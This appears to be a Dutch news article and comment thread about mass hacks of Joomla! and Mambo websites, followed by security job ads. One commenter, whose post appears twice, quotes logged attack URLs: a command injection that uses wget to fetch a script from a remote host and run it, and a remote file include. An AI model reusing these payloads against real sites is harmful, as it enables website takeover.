Joomla! en Mambo niet voor iedereen geschikt
De afgelopen dagen zijn er honderden Nederlandse websites gehackt via een van de vele lekken in Mambo of Joomla!. De open source content management systemen staan bekend om hun gebruiksvriendelijkheid en vele mogelijkheden en worden door miljoenen websites gebruikt. De software presenteert zich ook als makkelijk te installeren, eenvoudig te beheren, betrouwbaar en voor iedereen geschikt.
Alleen al in juli zijn er vier zeer ernstige lekken in modules en uitbreidingen voor beide pakketten gevonden. Lekken waardoor een aanvaller op eenvoudige wijze een website kan overnemen of aanpassen.
Het is allemaal goed en aardig dat mensen via twee krachtige tools hun website op het internet plaatsen, enig bewustzijn dat de website gehackt kan worden kan geen kwaad.
Eerlijkheid gebied te zeggen dat het voor de doorsnee Joomla! en Mambo gebruiker waarschijnlijk onbegonnen werk is om alle security advisories bij te houden en regelmatig de software bij te werken. Wil je echter niet door een van talloze scriptkiddies gehackt worden heb je gewoon geen keuze. Onze stelling luidt derhalve: Joomla! en Mambo niet voor iedereen geschikt
mensen installeren het, vergeten veel opties die ze niet
gebruiken uit te schakelen,w aardoor ze vaak niet eens in de
gaten hebben dat ze vatbaar zijn voor security leaks.
Je moet dit soort portals alleen gebruiken als je weet waar
je mee bezig bent, en je jezelf goed informeert over de
mogelijkheden 9en eventuele tekortkomingen) van de portal.
achter een iChain Appliance :)
uitgebreid. Veel mensen gebruiken het DUS veel hackers
hacken het.
Ik beheer meerdere Joomla sites. Maar je moet er wel wat
voor doen om een site goed (lees veilig) te krijgen. Als je iets niet
gebruikt dan moet je het uitschakelen. (Modules en componenten kunnen gewoon weggehaald worden als je ze niet gebruikt). Net als bij Windows.
Ook de filesecurity is aan te passen Standaard staat het
OPEN. dus moet je het handmatig dichtzetten.
En, Ja, ik ben het met de stelling eens. Ga eerst eens kijken naar wat je echt gebruikt voordat je een uitgebreid pakket selecteerd. Je hebt misschien niet alles van Joomla nodig zodat je ook een kaal pakket kan selecteren.
Gelukkig staat de joomla portal die ik half om half beheer
achter een iChain Appliance :)
En welke Joomla site is dat dan?
En wat is er dan WEL voor iedereen geschikt..?
Enkel "holle" kritiek geven op software levert geen enkele bijdrage
aan een zinvolle discussie omtrent Joomla software.
Joomla word zeer goed onderhouden door haar ontwikkel team en
de "lekken" waarover geschreven word zitten / zaten in modules en
niet in de kern van de software. En als er een lek in de Joomla kern
word gevonden dan is er vaak binnen 1 week een patch
beschikbaar.
Daarnaast is het altijd noodzakelijk om de server(s) goed
geconfigureerd te hebben, IDS / IPS systemen horen daar ook bij.
Via mijn hosting partner (http://www.mevershosting.nl) kan vrijwel
IEDEREEN Joomla gebruiken aangezien zij heel goed weten hoe
servers veilig geconfigureerd moeten worden.
B
stelling : lekke/brakke software is voor niemand geschikt.
Gelukkig staat de joomla portal die ik half om half beheer achter een iChain Appliance :)
Geldt ook voor Windows.
SirDice...dit moet zijn: bedoeld is
SirDice...dit moet zijn: bedoeld is
c.r.i.t.i.c.a.l.. S.h.u.t.t.i.n.g.. d.o.w.n.. t.o.
p.r.e.v.e.n.t....b.r.a.i.n.. m.e.l.t.d.o.w.n...
alles standaard open te zetten.
phpnuke en postnuke niet voor idereen geschikt !
windows en Linux niet voor iedereen geschikt !
MS Office en OpenOffice niet voor iedereen geschikt !
...
Dat is maar een heel vaag en niet doordacht berichtje.
Ik heb al meerdere CMS-systemen onder handen gehad van
phpnuke, postnuke, mambo, typo3,...en ben bij joomla blijven
hangen.
en geen enkel systeem is 100% veilig.
Of het nu een cms of andere software of hardware is.
Alles is te hacken. Het is alleen een vraag van geduld en tijd.
Bij de ene gaat het wat eenvoudiger als bij de een andere.
Maar bij joomla word het tamelijk snel onder handen genomen.
Kijk maar eens naar de tijd dat verlopen is van joomla 1.0.9
naar 1.0.10
Dat waren maar een paar weken.
Bij php-nuke kan je dat ver gaan zoeken. Want dat moeten
andere voor hun oplossen :-(
Ik kan er lang over zeveren.
Maar ik vind dat de redactie gerust eens wat meer tijd met
joomla kan verbrengen voordat met zulke berichten publiceerd
cu
is de website weer online, de site en zijn componenten
ge-update, en in het vervolg de nieuwsbrief maar beter in de
gaten houden voor nieuwe releases.
Maar dat updaten is zo ingewikkeld nog niet hoor... je moet
het alleen wel ffies doen. Net als een backup maken van je
systeem/websites/etc... veel mensen hebben dit ook op de
kwade manier moeten leren.
Veel mensen denken dat hé dat ziet er leuk uit maar weten niet dat het
slecht geprogrammeerd is.
Mambo is bedoeld voor beginners. De installatie is voor de
meeste nog wel te doen. Maar de hoeveelheid aan componenten,
modules en parameters en het doorkrijgen van het
achterliggende concept is andere koek. Net zoals het
up-to-date houden....
Kortom, een CMS is niet voor 'mietjes'
knullig geprogrammeerd:
/index.php?cmd=cd%20/tmp;wget%20http://bla.ru/script.txt;/tmp/script.txt.
of
/bla.php?include=http://bla.ru/script.txt
Dat is toch gewoon de deur open zetten vooor hackers!!!
Ik zou zeggen tegen mambo/joomla: leer eens programmeren!
Ik heb inmiddels url filters in apache toegepast zodat mijn
klanten ongegeneerd lekke versies van joomla/mambo kunnen
draaien.
Dus ik ben het met de stelling eens. Niet geschikt voor
iedereen.
Als ik zie hoe ze binnen komen dan vind ik dat wel heel
knullig geprogrammeerd:
/index.php?cmd=cd /tmp;wget http://bla.ru/script.txt;/tmp/script.txt.
of
/bla.php?include=http://bla.ru/script.txt
Dat is toch gewoon de deur open zetten vooor hackers!!!
Ik zou zeggen tegen mambo/joomla: leer eens programmeren!
Ik heb inmiddels url filters in apache toegepast zodat mijn
klanten ongegeneerd lekke versies van joomla/mambo kunnen
draaien.
Dus ik ben het met de stelling eens. Niet geschikt voor
iedereen.
ipv af te zeiken kan je misschien beter behulpzaam zijn.
http://forum.joomla.org/index.php?board=267.0
met een beetje verstand kom je er wel uit.
ipv af te zeiken kan je misschien beter behulpzaam zijn.
http://forum.joomla.org/index.php?board=267.0
met een beetje verstand kom je er wel uit.
het is allemaal fijn dat dat nu niet meer kan, maar dat het
ooit gekunt heeft geeft wel aan dat er niet netjes vanaf het
begin gewerkt is. en nog steeds duiken er wormen op die
zulke sites massaal aanpaken, dat zegt wat.
SirDice...dit moet zijn: bedoeld is
c.r.i.t.i.c.a.l.. S.h.u.t.t.i.n.g.. d.o.w.n.. t.o.
p.r.e.v.e.n.t....b.r.a.i.n.. m.e.l.t.d.o.w.n...
Jeetje SirDice...hoeveel zorg voor al die puntjes.............
Schuttingtaalachtige contructies worden hier niet gewaardeerd.
vernietigd worden. Simpel. Dat geldt ook voor Joomla. Evenals voor alle
andere software. Hoeveel geld steekt de industrie wel niet in het beveiligen
van software e.d.? En niks heeft tot nu toe geholpen. Windows krijgt ook
constant commentaar op lekken die ontdekt worden. Dus is windows ook
niet geschikt voor beginners (Ik heb een virus. Ik heb een Trojan.Bla bla
bla)? Het is wel het populairste OS!
Als je je een klein beetje verdiept in Joomla! en de community bijhoudt,
kun je veel problemen voorkomen.
Ik heb inmiddels url filters in apache toegepast zodat mijn
klanten ongegeneerd lekke versies van joomla/mambo kunnen
draaien.
Zeggen dat je het hebt opgelost zonder de oplossing te vertellen maakt
niemand wijzer...
- Joomla en Mambo zijn feitelijk de enige middelen om een
beetje site in elkaar te knutselen. Van leven ga je dood,
tja....
- Als miljoenen sites hiermee zijn gebouwd, hoe groot is dan
de kans dat precies jouw site wordt gehackt?
- En als jouw site wordt gehackt, wat dan nog? De
desbetreffende CMS's zijn leuk voor voetbalclubs en
wijkverenigingen, maar je haalt het toch niet in je hoofd om
ze voor commerciële doeleinden te gebruiken?
- Wie kan er nog Nederlands:
- Eerlijkheid gebied te zeggen
- voordat je een uitgebreid pakket selecteerd
- Joomla word zeer goed onderhouden
- vooral een pakket wat hoofdzakelijk bedoelt is (wat -> dat)
- alleen een vraag van geduld en tijd (vraag -> kwestie)
- gekunt
ALLES wat door een mens gemaakt wordt kan door een ander mens
vernietigd worden.
Móóóie gedachte, in al zijn triestheid.
Harry
dat zal het zeker niet worden. Vooral vanwege het feit dat mensen overhaaste
beslissingen nemen door joomla te installeren. Vaak is de reden "dan hoef ik
teminste niks te kunnen". Maar iedere ECHTE webontwikkelaar met
programmeer ervaring weet dat open source applicaties zoals joomla en
mambo vaak stikken van de lekken.
Daarom is mijn advies. Ga een programmeer taal leren en vertrouw niet op
kant en klare templates en/of webapplicaties maar ga voor maatwerk. dat is
het echte werk!
Deze posting is gelocked. Reageren is niet meer mogelijk.
Toezichthouder informatiebeveiliging Overheid
Rijksinspectie Digitale Infrastructuur (RDI)
Vind je het leuk om als toezichthouder bij te dragen aan de verdere groei in informatie-beveiliging van de overheid en in contact te staan met (belangen) organisaties binnen de overheid? Dan kun je komen bouwen aan toezicht op een veilige en betrouwbare Digitale Infrastructuur in Nederland.
Adviseur Informatiebeveiliging
Je bent een belangrijke speler om invulling te geven aan de gemeentelijke ambities op het gebied van informatiebeveiliging. Deze ambities neem jij op in het Informatie-beveiligingsbeleid Gemeente Zoetermeer. Wil je helpen bij het verbeteren van de informatiebeveiliging in Zoetermeer en het versterken van het cyberbewustzijn binnen onze organisatie? Wacht dan niet en kom ons team informatiebeveiliging versterken!
Digital Designer
Ben jij een Grafisch vormgever, UI-designer, Game-artist of gewoon een ‘self-proclaimed creative genius’, die op zoek is naar een leuke en uitdagende baan waarin je al je creativiteit kwijt kan?Je werkt samen met onze developers en UI/UX-designer aan onze Gamified Cybersecurity Challenges welke jij voorziet van de mooiste designs.
Senior Full Stack Developer
Als full stack developer bij Certified Secure maak je de mooiste cybersecurity challenges die onze deelnemers wereldwijd uitdagen en inspireren. Alle challenges zijn gebaseerd op actuele kwetsbaarheden, je komt dus telkens nieuwe technieken tegen, van machine learning tot web assembly, van Swift UI tot GCP.